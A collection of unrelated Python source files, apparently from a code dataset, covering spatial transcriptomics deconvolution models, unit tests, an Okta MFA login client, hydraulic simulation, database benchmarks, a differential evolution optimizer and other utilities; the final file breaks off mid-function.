# first we have the scRNA-seq model
self.module = RNADeconv(
n_genes=self.n_genes,
n_labels=self.n_labels,
**model_kwargs,
)
self._model_summary_string = (
"RNADeconv Model with params: \nn_genes: {}, n_labels: {}"
).format(
self.n_genes,
self.n_labels,
)
self.init_params_ = self._get_init_params(locals())
def train(
self,
max_epochs: int = 400,
lr: float = 0.01,
use_gpu: Optional[Union[str, int, bool]] = None,
train_size: float = 1,
validation_size: Optional[float] = None,
batch_size: int = 128,
plan_kwargs: Optional[dict] = None,
**kwargs,
):
"""
Trains the model using MAP inference.
Parameters
----------
max_epochs
Number of epochs to train for
lr
Learning rate for optimization.
use_gpu
Use default GPU if available (if None or True), or index of GPU to use (if int),
or name of GPU (if str, e.g., `'cuda:0'`), or use CPU (if False).
train_size
Size of training set in the range [0.0, 1.0].
validation_size
Size of the test set. If `None`, defaults to 1 - `train_size`. If
`train_size + validation_size < 1`, the remaining cells belong to a test set.
batch_size
Minibatch size to use during training.
plan_kwargs
Keyword args for :class:`~scvi.train.TrainingPlan`. Keyword arguments passed to
`train()` will overwrite values present in `plan_kwargs`, when appropriate.
**kwargs
Other keyword args for :class:`~scvi.train.Trainer`.
"""
update_dict = {
"lr": lr,
}
if plan_kwargs is not None:
plan_kwargs.update(update_dict)
else:
plan_kwargs = update_dict
super().train(
max_epochs=max_epochs,
use_gpu=use_gpu,
train_size=train_size,
validation_size=validation_size,
batch_size=batch_size,
plan_kwargs=plan_kwargs,
**kwargs,
)
@classmethod
@setup_anndata_dsp.dedent
def setup_anndata(
cls,
adata: AnnData,
labels_key: Optional[str] = None,
layer: Optional[str] = None,
**kwargs,
):
"""
%(summary)s.
Parameters
----------
%(param_labels_key)s
%(param_layer)s
"""
setup_method_args = cls._get_setup_method_args(**locals())
anndata_fields = [
LayerField(REGISTRY_KEYS.X_KEY, layer, is_count_data=True),
CategoricalObsField(REGISTRY_KEYS.LABELS_KEY, labels_key),
]
adata_manager = AnnDataManager(
fields=anndata_fields, setup_method_args=setup_method_args
)
adata_manager.register_fields(adata, **kwargs)
cls.register_manager(adata_manager)
class SpatialStereoscope(UnsupervisedTrainingMixin, BaseModelClass):
"""
Reimplementation of Stereoscope [Andersson20]_ for deconvolution of spatial transcriptomics from single-cell transcriptomics.
https://github.com/almaan/stereoscope.
Parameters
----------
st_adata
spatial transcriptomics AnnData object that has been registered via :meth:`~scvi.external.SpatialStereoscope.setup_anndata`.
sc_params
parameters of the model learned from the single-cell RNA seq data for deconvolution.
cell_type_mapping
numpy array mapping for the cell types used in the deconvolution
prior_weight
how to reweight the minibatches for stochastic optimization. "n_obs" is the valid
procedure, "minibatch" is the procedure implemented in Stereoscope.
**model_kwargs
Keyword args for :class:`~scvi.external.stereoscope.SpatialDeconv`
Examples
--------
>>> sc_adata = anndata.read_h5ad(path_to_sc_anndata)
>>> scvi.external.RNAStereoscope.setup_anndata(sc_adata, labels_key="labels")
>>> sc_model = scvi.external.stereoscope.RNAStereoscope(sc_adata)
>>> sc_model.train()
>>> st_adata = anndata.read_h5ad(path_to_st_anndata)
>>> scvi.external.SpatialStereoscope.setup_anndata(st_adata)
>>> stereo = scvi.external.stereoscope.SpatialStereoscope.from_rna_model(st_adata, sc_model)
>>> stereo.train()
>>> st_adata.obsm["deconv"] = stereo.get_proportions()
Notes
-----
See further usage examples in the following tutorials:
1. :doc:`/user_guide/notebooks/stereoscope_heart_LV_tutorial`
"""
def __init__(
self,
st_adata: AnnData,
sc_params: Tuple[np.ndarray],
cell_type_mapping: np.ndarray,
prior_weight: Literal["n_obs", "minibatch"] = "n_obs",
**model_kwargs,
):
super().__init__(st_adata)
self.module = SpatialDeconv(
n_spots=st_adata.n_obs,
sc_params=sc_params,
prior_weight=prior_weight,
**model_kwargs,
)
self._model_summary_string = (
"RNADeconv Model with params: \nn_spots: {}"
).format(
st_adata.n_obs,
)
self.cell_type_mapping = cell_type_mapping
self.init_params_ = self._get_init_params(locals())
@classmethod
def from_rna_model(
cls,
st_adata: AnnData,
sc_model: RNAStereoscope,
prior_weight: Literal["n_obs", "minibatch"] = "n_obs",
layer: Optional[str] = None,
**model_kwargs,
):
"""
Alternate constructor for exploiting a pre-trained model on RNA-seq data.
Parameters
----------
st_adata
registed anndata object
sc_model
trained RNADeconv model
prior_weight
how to reweight the minibatches for stochastic optimization. "n_obs" is the valid
procedure, "minibatch" is the procedure implemented in Stereoscope.
layer
if not `None`, uses this as the key in `adata.layers` for raw count data.
**model_kwargs
Keyword args for :class:`~scvi.external.SpatialDeconv`
"""
cls.setup_anndata(st_adata, layer=layer)
return cls(
st_adata,
sc_model.module.get_params(),
sc_model.adata_manager.get_state_registry(
REGISTRY_KEYS.LABELS_KEY
).categorical_mapping,
prior_weight=prior_weight,
**model_kwargs,
)
def get_proportions(self, keep_noise=False) -> pd.DataFrame:
"""
Returns the estimated cell type proportion for the spatial data.
Shape is n_cells x n_labels OR n_cells x (n_labels + 1) if keep_noise
Parameters
----------
keep_noise
whether to account for the noise term as a standalone cell type in the proportion estimate.
"""
self._check_if_trained()
column_names = self.cell_type_mapping
if keep_noise:
column_names = column_names.append("noise_term")
return pd.DataFrame(
data=self.module.get_proportions(keep_noise),
columns=column_names,
index=self.adata.obs.index,
)
def get_scale_for_ct(
self,
y: np.ndarray,
) -> np.ndarray:
r"""
Calculate the cell type specific expression.
Parameters
----------
y
numpy array containing the list of cell types
Returns
-------
gene_expression
"""
self._check_if_trained()
ind_y = np.array([np.where(ct == self.cell_type_mapping)[0][0] for ct in y])
if ind_y.shape != y.shape:
raise ValueError(
"Incorrect shape after matching cell types to reference mapping. Please check cell type query."
)
px_scale = self.module.get_ct_specific_expression(torch.tensor(ind_y)[:, None])
return np.array(px_scale.cpu())
def train(
self,
max_epochs: int = 400,
lr: float = 0.01,
use_gpu: Optional[Union[str, int, bool]] = None,
batch_size: int = 128,
plan_kwargs: Optional[dict] = None,
**kwargs,
):
"""
Trains the model using MAP inference.
Parameters
----------
max_epochs
Number of epochs to train for
lr
Learning rate for optimization.
use_gpu
Use default GPU if available (if None or True), or index of GPU to use (if int),
or name of GPU (if str, e.g., `'cuda:0'`), or use CPU (if False).
batch_size
Minibatch size to use during training.
plan_kwargs
Keyword args for :class:`~scvi.train.TrainingPlan`. Keyword arguments passed to
`train()` will overwrite values present in `plan_kwargs`, when appropriate.
**kwargs
Other keyword args for :class:`~scvi.train.Trainer`.
"""
update_dict = {
"lr": lr,
}
if plan_kwargs is not None:
plan_kwargs.update(update_dict)
else:
plan_kwargs = update_dict
super().train(
max_epochs=max_epochs,
use_gpu=use_gpu,
train_size=1,
validation_size=None,
batch_size=batch_size,
plan_kwargs=plan_kwargs,
**kwargs,
)
@classmethod
@setup_anndata_dsp.dedent
def setup_anndata(
cls,
adata: AnnData,
layer: Optional[str] = None,
**kwargs,
):
"""
%(summary)s.
Parameters
----------
%(param_layer)s
"""
setup_method_args = cls._get_setup_method_args(**locals())
# add index for each cell (provided to pyro plate for correct minibatching)
adata.obs["_indices"] = np.arange(adata.n_obs)
anndata_fields = [
LayerField(REGISTRY_KEYS.X_KEY, layer, is_count_data=True),
NumericalObsField(REGISTRY_KEYS.INDICES_KEY, "_indices"),
]
adata_manager = AnnDataManager(
fields=anndata_fields, setup_method_args=setup_method_args
)
adata_manager.register_fields(adata, **kwargs)
cls.register_manager(adata_manager)
|
1619176
|
import unittest
from fluentcheck.classes import Check
from fluentcheck.exceptions import CheckError
class TestDictsAssertions(unittest.TestCase):
def test_is_dict(self):
res = Check({}).is_dict()
self.assertIsInstance(res, Check)
try:
Check(123).is_dict()
self.fail()
except CheckError:
pass
def test_is_not_dict(self):
res = Check(set()).is_not_dict()
self.assertIsInstance(res, Check)
try:
Check({}).is_not_dict()
self.fail()
except CheckError:
pass
def test_has_keys(self):
d = { 1: 'one', 2: 'two'}
res = Check(d).has_keys(1,2)
self.assertIsInstance(res, Check)
try:
Check(d).has_keys(3,4)
self.fail()
except CheckError:
pass
def test_has_not_keys(self):
d = { 1: 'one', 2: 'two'}
res = Check(d).has_not_keys(3,4)
self.assertIsInstance(res, Check)
try:
Check(d).has_not_keys(1,2)
self.fail()
except CheckError:
pass
|
1619217
|
import heapq
"""
Definition of Interval.
class Interval(object):
def __init__(self, start, end):
self.start = start
self.end = end
"""
class Solution:
"""
@param intervals: the given k sorted interval lists
@return: the new sorted interval list
"""
def mergeKSortedIntervalLists(self, intervals):
# write your code here
if not intervals or len(intervals) == 0:
return intervals
heap, merged = [], []
for idx, interval in enumerate(intervals):
if interval:
heapq.heappush(heap, (interval[0].start, interval[0].end, idx, 0))
while heap:
start, end, idx1, idx2 = heap[0]
heapq.heappop(heap)
if len(merged) == 0 or merged[-1].end < start:
merged.append(Interval(start, end))
else:
merged[-1].end = max(merged[-1].end, end)
if idx2 + 1 < len(intervals[idx1]):
heapq.heappush(heap, (intervals[idx1][idx2 + 1].start, intervals[idx1][idx2 + 1].end, idx1, idx2 + 1))
return merged
|
1619381
|
import time
import sys
from urllib.parse import parse_qs
from urllib.parse import urlparse
from oktaawscli.version import __version__
class OktaAuthMfaApp():
""" Handles per-app Okta MFA """
def __init__(self, logger, session, verify_ssl, auth_url):
self.session = session
self.logger = logger
self._verify_ssl_certs = verify_ssl
self._preferred_mfa_type = None
self._mfa_code = None
self._auth_url = auth_url
def stepup_auth(self, embed_link, state_token=None):
""" Login to Okta using the Step-up authentication flow"""
flow_state = self._get_initial_flow_state(embed_link, state_token)
while flow_state.get('apiResponse').get('status') != 'SUCCESS':
flow_state = self._next_login_step(
flow_state.get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def _next_login_step(self, state_token, login_data):
""" decide what the next step in the login process is"""
if 'errorCode' in login_data:
self.logger.error("LOGIN ERROR: {} | Error Code: {}".format(login_data['errorSummary'], login_data['errorCode']))
sys.exit(2)
status = login_data['status']
if status == 'UNAUTHENTICATED':
self.logger.error("You are not authenticated -- please try to log in again")
sys.exit(2)
elif status == 'LOCKED_OUT':
self.logger.error("Your Okta access has been locked out due to failed login attempts.")
sys.exit(2)
elif status == 'MFA_ENROLL':
self.logger.error("You must enroll in MFA before using this tool.")
sys.exit(2)
elif status == 'MFA_REQUIRED':
return self._login_multi_factor(state_token, login_data)
elif status == 'MFA_CHALLENGE':
if 'factorResult' in login_data and login_data['factorResult'] == 'WAITING':
return self._check_push_result(state_token, login_data)
else:
return self._login_input_mfa_challenge(state_token, login_data['_links']['next']['href'])
else:
raise RuntimeError('Unknown login status: ' + status)
def _get_initial_flow_state(self, embed_link, state_token=None):
""" Starts the authentication flow with Okta"""
if state_token is None:
response = self.session.get(
embed_link, allow_redirects=False)
url_parse_results = urlparse(response.headers['Location'])
state_token = parse_qs(url_parse_results.query)['stateToken'][0]
response = self.session.post(
self._auth_url,
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
return {'stateToken': state_token, 'apiResponse': response.json()}
def _get_headers(self):
return {
'User-Agent': "okta-awscli/%s" % __version__,
'Accept': 'application/json',
'Content-Type': 'application/json'
}
def _choose_factor(self, factors):
""" gets a list of available authentication factors and
asks the user to select the factor they want to use """
print("Multi-factor Authentication required for application.")
# filter the factor list down to just the types specified in preferred_mfa_type
if self._preferred_mfa_type is not None:
factors = list(filter(lambda item: item['factorType'] == self._preferred_mfa_type, factors))
if len(factors) == 1:
factor_name = self._build_factor_name(factors[0])
self.logger.info("%s selected" % factor_name)
selection = 0
else:
print("Pick a factor:")
# print out the factors and let the user select
for i, factor in enumerate(factors):
factor_name = self._build_factor_name(factor)
if factor_name:
print('[ %d ] %s' % (i, factor_name))
selection = input("Selection: ")
# make sure the choice is valid
if int(selection) > len(factors):
self.logger.error("You made an invalid selection")
sys.exit(1)
return factors[int(selection)]
@staticmethod
def _build_factor_name(factor):
""" Build the display name for a MFA factor based on the factor type"""
if factor['factorType'] == 'push':
return "Okta Verify App: " + factor['profile']['deviceType'] + ": " + factor['profile']['name']
elif factor['factorType'] == 'sms':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'call':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'token:software:totp':
return factor['factorType'] + "( " + factor['provider'] + " ) : " + factor['profile']['credentialId']
elif factor['factorType'] == 'token':
return factor['factorType'] + ": " + factor['profile']['credentialId']
else:
return "Unknown MFA type: " + factor['factorType']
def _login_send_sms(self, state_token, factor):
""" Send SMS message for second factor authentication"""
response = self.session.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
self.logger.info("A verification code has been sent to " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_call(self, state_token, factor):
""" Send Voice call for second factor authentication"""
response = self.session.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
self.logger.info("You should soon receive a phone call at " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_push(self, state_token, factor):
""" Send 'push' for the Okta Verify mobile app """
response = self.session.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
self.logger.info("Okta Verify push sent...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_multi_factor(self, state_token, login_data):
""" handle multi-factor authentication with Okta"""
factor = self._choose_factor(login_data['_embedded']['factors'])
if factor['factorType'] == 'sms':
return self._login_send_sms(state_token, factor)
elif factor['factorType'] == 'call':
return self._login_send_call(state_token, factor)
elif factor['factorType'] == 'token:software:totp':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'token':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'push':
return self._login_send_push(state_token, factor)
def _login_input_mfa_challenge(self, state_token, next_url):
""" Submit verification code for SMS or TOTP authentication methods"""
pass_code = self._mfa_code
if pass_code is None:
pass_code = input("Enter MFA verification code: ")
response = self.session.post(
next_url,
json={'stateToken': state_token, 'passCode': pass_code},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_push_result(self, state_token, login_data):
""" Check Okta API to see if the push request has been responded to"""
time.sleep(1)
response = self.session.post(
login_data['_links']['next']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
|
1619476
|
from __future__ import absolute_import
from django.views.generic import View
from raven.contrib.django.models import client
from sentry.web.frontend.error_500 import Error500View
class DebugTriggerErrorView(View):
def get(self, request):
try:
raise ValueError('An example error')
except Exception:
client.captureException(request=request)
return Error500View.as_view()(request)
|
1619484
|
from common.constant import StatusCode, ResponseStatus
from common.logger import get_logger
from common.repository import Repository
from common.utils import Utils, handle_exception_with_slack_notification, generate_lambda_response, make_response_body
from wallets.config import NETWORKS, NETWORK_ID, SLACK_HOOK
from wallets.service.wallet_service import WalletService
NETWORKS_NAME = dict((NETWORKS[netId]['name'], netId) for netId in NETWORKS.keys())
repo = Repository(net_id=NETWORK_ID, NETWORKS=NETWORKS)
utils = Utils()
logger = get_logger(__name__)
wallet_service = WalletService(repo=repo)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def delete_user_wallet(event, context):
query_parameters = event["queryStringParameters"]
username = query_parameters["username"]
wallet_service.remove_user_wallet(username)
return generate_lambda_response(StatusCode.CREATED, make_response_body(
ResponseStatus.SUCCESS, "OK", {}
), cors_enabled=False)
|
1619487
|
import os.path
import sys
import anuga
from anuga import myid, numprocs, finalize, barrier
from anuga import Inlet_operator, Boyd_box_operator
"""
This test exercises the parallel culvert
"""
verbose = True
length = 40.
width = 16.
dx = dy = 2 # Resolution: Length of subdivisions on both axes
#----------------------------------------------------------------------
# Setup initial conditions
#----------------------------------------------------------------------
def topography(x, y):
"""Set up a weir
A culvert will connect either side
"""
# General Slope of Topography
z=-x/1000
N = len(x)
for i in range(N):
# Sloping Embankment Across Channel
if 5.0 < x[i] < 10.1:
# Cut Out Segment for Culvert face
if 1.0+(x[i]-5.0)/5.0 < y[i] < 4.0 - (x[i]-5.0)/5.0:
z[i]=z[i]
else:
z[i] += 0.5*(x[i] -5.0) # Sloping Segment U/S Face
if 10.0 < x[i] < 12.1:
z[i] += 2.5 # Flat Crest of Embankment
if 12.0 < x[i] < 14.5:
# Cut Out Segment for Culvert face
if 2.0-(x[i]-12.0)/2.5 < y[i] < 3.0 + (x[i]-12.0)/2.5:
z[i]=z[i]
else:
z[i] += 2.5-1.0*(x[i] -12.0) # Sloping D/S Face
return z
##-----------------------------------------------------------------------
## Setup domain
##-----------------------------------------------------------------------
if myid == 0:
points, vertices, boundary = anuga.rectangular_cross(int(length/dx),
int(width/dy),
len1=length,
len2=width)
domain = anuga.Domain(points, vertices, boundary)
domain.set_name() # Output name output_script_name.sww
#domain.set_flow_algorithm('1_5')
else:
domain = None
##-----------------------------------------------------------------------
## Distribute domain
##-----------------------------------------------------------------------
domain = anuga.distribute(domain)
#domain.dump_triangulation("run_parallel_boyd_box_op_domain.png")
##-----------------------------------------------------------------------
## Setup boundary conditions
##-----------------------------------------------------------------------
domain.set_quantity('elevation', topography)
domain.set_quantity('friction', 0.01) # Constant friction
domain.set_quantity('stage',
expression='elevation') # Dry initial condition
Bi = anuga.Dirichlet_boundary([5.0, 0.0, 0.0])
Br = anuga.Reflective_boundary(domain) # Solid reflective wall
domain.set_boundary({'left': Br, 'right': Br, 'top': Br, 'bottom': Br})
################ Define Fractional Operators ##########################
line0 = [[10.0, 10.0], [30.0, 10.0]]
#line0 = [[29.0, 10.0], [30.0, 10.0]]
poly1 = [[0.0, 10.0], [0.0, 15.0], [5.0, 15.0], [5.0, 10.0]]
Q0 = anuga.file_function('data/test_hydrograph.tms', quantities=['hydrograph'])
Q1 = 5.0
samples = 50
inlet0 = None
inlet1 = None
boyd_box0 = None
inlet0 = Inlet_operator(domain, line0, Q0, logging=True, description='inlet0', verbose = False)
inlet1 = Inlet_operator(domain, poly1, Q1, logging=True, description='inlet1', verbose = False)
# Enquiry point [ 19. 2.5] is contained in two domains in 4 proc case
boyd_box0 = Boyd_box_operator(domain,
end_points=[[9.0, 2.5],[19.0, 2.5]],
losses=1.5,
width=5.0,
apron=5.0,
use_momentum_jet=True,
use_velocity_head=False,
manning=0.013,
logging=True,
description='boyd_box_0',
verbose=False)
#if inlet0 is not None and verbose: inlet0.print_statistics()
#if inlet1 is not None and verbose: inlet1.print_statistics()
#if boyd_box0 is not None and verbose: boyd_box0.print_statistics()
sys.stdout.flush()
barrier()
##-----------------------------------------------------------------------
## Evolve system through time
##-----------------------------------------------------------------------
for t in domain.evolve(yieldstep = 2.0, finaltime = 20.0):
if verbose:
domain.write_time()
sys.stdout.flush()
#print domain.volumetric_balance_statistics()
barrier()
stage = domain.get_quantity('stage')
if boyd_box0 is not None and verbose :
#print myid
boyd_box0.print_timestepping_statistics()
sys.stdout.flush()
#for i in range(samples):
# if tri_ids[i] >= 0:
# if verbose: print 'P%d tri %d, value = %s' %(myid, i, stage.centroid_values[tri_ids[i]])
barrier()
##-----------------------------------------------------------------------
## Assign/Test Control data
##-----------------------------------------------------------------------
domain.sww_merge(delete_old=True)
finalize()
|
1619501
|
import os
from pathlib import Path
from unittest import mock
@mock.patch("click.get_app_dir", autospec=True)
def test_new_config(gad, tmp_path: Path, monkeypatch):
# TODO - is there a way to run this within the normal test framework, i.e. perhaps unloading/reloading datapane module so we can
# setup our mocks/patches first?
# patch the config file path and no_analytics
gad.return_value = str(tmp_path)
monkeypatch.chdir(tmp_path)
with mock.patch("datapane.client.analytics.posthog", autospec=True) as posthog, mock.patch(
"datapane.client.analytics._NO_ANALYTICS", False
), mock.patch("datapane.client.api.user.ping", autospect=True) as ping:
ping.return_value = "joebloggs"
from datapane.client import config as c
# check pre-invariants
assert c.config.version == 3
assert c.config.username == ""
assert not c.config.completed_action
assert posthog.identify.call_count == 0
assert posthog.capture.call_count == 0
# run login event
import datapane as dp
from datapane.client import config as c
username = dp.login(token="TOKEN")
assert username == "joebloggs"
# check config file
assert c.config.version == 3
assert c.config.username == "joebloggs"
assert c.config.completed_action
# check analytics
assert posthog.identify.call_count == 1
assert posthog.capture.call_count == 2
# load and check config file
_config = c.Config.load()
assert c.config.version == 3
assert _config.username == "joebloggs"
assert _config.completed_action
# run additional event
# depends on fe-components - only run locally
if "CI" not in os.environ:
from tests.client.local.api.test_reports import gen_report_simple
report = gen_report_simple()
report.save(path="test_out.html", name="My Wicked Report", author="<NAME>")
assert posthog.identify.call_count == 1
assert posthog.capture.call_count == 3
|
1619521
|
import taichi as ti
import numpy as np
A = np.array([
[0, 1, 0],
[1, 0, 1],
[0, 1, 0],
])
def conv(A, B):
m, n = A.shape
s, t = B.shape
C = np.zeros((m + s - 1, n + t - 1), dtype=A.dtype)
for i in range(m):
for j in range(n):
for k in range(s):
for l in range(t):
C[i + k, j + l] += A[i, j] * B[k, l]
return C
B = A
print(B)
B = conv(B, A)
print(B)
B = conv(B, A)
print(B)
B = conv(B, A)
print(B)
|
1619522
|
import distutils.core, shutil, os, py2exe, subprocess, os, re, platform
' grep imports from first line of python files in given folder '
def grepimports(dir):
imports = set()
IMPORT_ = 'import '
for f in os.listdir(dir):
p = os.path.join(dir, f)
if not p.endswith("py"): continue
for line in file(p):
if line.startswith(IMPORT_):
for i in line[len(IMPORT_):].split(','):
imports.add(i.strip())
break
return list(imports)
# check revision
svnversion = 'XXX'
try:
svnversion = str(subprocess.check_output("svnversion")).strip()
except:
print("Failed to determine revision - is svnversion in path?")
pass
try:
svnversion = int(svnversion)
print("Source @ revision %s" % svnversion)
except:
svnversion = svnversion.replace(':', '-')
print("Source @ modified revision %s" % svnversion)
arch = platform.architecture()[0]
# clean up
shutil.rmtree(os.path.join("build", arch), True)
# calculate extra files
def make_data_files(roots):
data = []
for root in roots:
if os.path.isdir(root):
for dirpath, dirnames, filenames in os.walk(root, True, None, False):
if filenames:
data.append( (dirpath, [os.path.join(dirpath, f) for f in filenames if not '.pyc' in f]) )
if '__pycache__' in dirnames:
dirnames.remove('__pycache__')
if '.svn' in dirnames:
dirnames.remove('.svn')
else:
data.append( ('', [root]) )
return data
dist = os.path.join("build", arch , "dist")
options = {
"dist_dir": dist,
"includes": grepimports('modules'),
"excludes" : [],
"dll_excludes": ["w9xpopen.exe"],
"packages": []
}
data_files = make_data_files(['contrib', 'modules', 'scripts', 'simscript.ico'])
simscript = {'script':'simscript.py', 'dest_base':'simscript', 'icon_resources':[(1,"simscript.ico")]}
tail = {'script':'tail.py'}
distutils.core.setup(console=[tail], windows=[simscript], options={'py2exe' :options}, data_files=data_files)
shutil.make_archive('build/simscript-%s-r%s' % (arch, svnversion), 'zip', dist, '.')
|
1619575
|
from clickhouse_driver import Client
import datetime
import pytz
import os
import datetime
import time
import sys
from urllib.parse import urlparse
url = os.environ.get('DATABASE_URL',"tcp://default@localhost/default?compression=lz4")
url = urlparse(url)._replace(scheme='clickhouse').geturl()
client = Client.from_url(url)
ddl = ("CREATE TABLE IF NOT EXISTS perf_py ("
"id UInt32,"
"name String,"
"dt DateTime "
") Engine=MergeTree PARTITION BY name ORDER BY dt")
client.execute("DROP TABLE IF EXISTS perf_py")
client.execute( ddl )
NAMES = ["one","two","three","four","five"];
BSIZE = 10000
CIRCLE = 1000
def next_block(i):
now = datetime.datetime.now()
sec = datetime.timedelta(seconds=1)
block = []
for i in range(BSIZE):
block.append([i, NAMES[ i % len(NAMES) ], now + i * sec ] )
return block
def select_perf():
start_time = time.time_ns()
settings = {'max_block_size': 100000}
rows = client.execute_iter("SELECT * FROM perf",settings=settings)
for row in rows:
pass
print("elapsed %s msec" % ( (time.time_ns() - start_time)/1000000 ))
def insert_perf():
start_time = time.time_ns()
for i in range(0,CIRCLE):
client.execute('INSERT INTO perf_py (id, name, dt) VALUES', next_block(i) )
print("elapsed %s msec" % ( (time.time_ns() - start_time)/1000000 ))
if __name__ == "__main__":
if len( sys.argv )<2:
print("specify perf test. 'insert' or 'select'. bench.py <name>.")
sys.exit(1)
perf_name = sys.argv[1]
f = globals()[ perf_name + "_perf" ]
f()
|
1619619
|
import numpy as np
def differential_evolution(fobj, bounds, mut=0.8, crossprob=0.7, popsize=30, gens=1000, mode='best/1'):
# Gets number of parameters (length of genome vector)
num_params = len(bounds)
# Initializes the population genomes with values drawn from uniform distribution in the range [0,1]
pop = np.random.rand(popsize, num_params)
# Gets the boundaries for each parameter to scale the population genomes
min_b, max_b = np.asarray(bounds).T
# Scales the population genomes from the range [0,1] to the range specified by the parameter boundaries
diff = np.fabs(min_b - max_b)
pop_scaled = min_b + pop * diff
# Evaluates fitness for each individual in the population by calculating the objective to minimize
unfitness = np.asarray([fobj(ind) for ind in pop_scaled])
# Gets the best individual of the population
best_idx = np.argmin(unfitness)
best = pop_scaled[best_idx]
for i in range(gens):
print('Best unfitness in generation %d: %f' % (i + 1, unfitness[best_idx]))
# For each individual:
for j in range(popsize):
# Selects three individuals from the population different than himself(no jerking off) for reproduction
if mode == 'best/1':
idxs = [idx for idx in range(popsize) if (idx != j and idx != best_idx)]
a = best
b, c = pop[np.random.choice(idxs, 2, replace=False)]
mutant = np.clip(a + mut * (b - c), 0, 1)
elif mode == 'best/2':
idxs = [idx for idx in range(popsize) if (idx != j and idx != best_idx)]
a = best
b, c, d, e = pop[np.random.choice(idxs, 4, replace=False)]
# Generates a mutant by applying the differential mutation (and clips to keep in range [0,1])
mutant = np.clip(a + mut * (b - c + d - e), 0, 1)
elif mode == 'rand/1':
idxs = [idx for idx in range(popsize) if idx != j]
a, b, c = pop[np.random.choice(idxs, 3, replace=False)]
# Generates a mutant by applying the differential mutation (and clips to keep in range [0,1])
mutant = np.clip(a + mut * (b - c), 0, 1)
elif mode == 'rand/2':
idxs = [idx for idx in range(popsize) if idx != j]
a, b, c, d, e = pop[np.random.choice(idxs, 5, replace=False)]
# Generates a mutant by applying the differential mutation (and clips to keep in range [0,1])
mutant = np.clip(a + mut * (b - c + d - e), 0, 1)
# Selects parameters of the individual to crossover with the mutant with the probability of crossover
cross_points = np.random.rand(num_params) < crossprob
# If some parameter results to need crossover ...
if not np.any(cross_points):
# selects the index of that parameter for crossover
cross_points[np.random.randint(0, num_params)] = True
# The parameters of the individual's genome that require crossover gets changed for those of the mutant,
# producing a new individual
trial = np.where(cross_points, mutant, pop[j])
# Scales the genome of the new individual from the range [0,1] to the range specified by the parameter
# boundaries
trial_denorm = min_b + trial * diff
# Evaluates fitness of new individual
f = fobj(trial_denorm)
# If better than the previous one, keeps the new one
if f < unfitness[j]:
unfitness[j] = f
pop[j] = trial
# If better than the best one so far, updates the record
if f < unfitness[best_idx]:
best_idx = j
best = trial_denorm
yield best, unfitness[best_idx]
|
1619646
|
import os
import sys
class Config(object):
"""Configuration variables for this test suite
This creates a variable named CONFIG (${CONFIG} when included
in a test as a variable file.
Example:
*** Settings ***
| Variable | ../resources/config.py
*** Test Cases ***
| Example
| | log | username: ${CONFIG}.username
| | log | root url: ${CONFIG}.root_url
"""
def __init__(self):
_here = os.path.dirname(__file__)
sys.path.insert(0, os.path.abspath(os.path.join(_here, "..", "..")))
sys.path.insert(0, os.path.abspath(os.path.join(_here)))
self.demo_root = os.path.abspath(os.path.join(_here, ".."))
self.port = 8000
self.root_url = "http://localhost:%s" % self.port
self.username = "test user"
self.password = "password"
def __str__(self):
return "<Config: %s>" % str(self.__dict__)
# This creates a variable that robot can see
CONFIG = Config()
|
1619698
|
import numpy as np
from pybasicbayes.distributions import AutoRegression, DiagonalRegression, Regression
def get_empirical_ar_params(train_datas, params):
"""
Estimate the parameters of an AR observation model
by fitting a single AR model to the entire dataset.
"""
assert isinstance(train_datas, list) and len(train_datas) > 0
datadimension = train_datas[0].shape[1]
assert params["nu_0"] > datadimension + 1
# Initialize the observation parameters
obs_params = dict(nu_0=params["nu_0"],
S_0=params['S_0'],
M_0=params['M_0'],
K_0=params['K_0'],
affine=params['affine'])
# Fit an AR model to the entire dataset
obs_distn = AutoRegression(**obs_params)
obs_distn.max_likelihood(train_datas)
# Use the inferred noise covariance as the prior mean
# E_{IW}[S] = S_0 / (nu_0 - datadimension - 1)
obs_params["S_0"] = obs_distn.sigma * (params["nu_0"] - datadimension - 1)
obs_params["M_0"] = obs_distn.A.copy()
return obs_params
def expected_hmm_logprob(pi_0, trans_matrix, stats):
"""
:param pi_0: initial distribution
:param trans_matrix: transition matrix
:param stats: tuple (E[z_t], \sum_t E[z_t z_{t+1}.T])
:return: E_{q(z)} [ log p(z) ]
"""
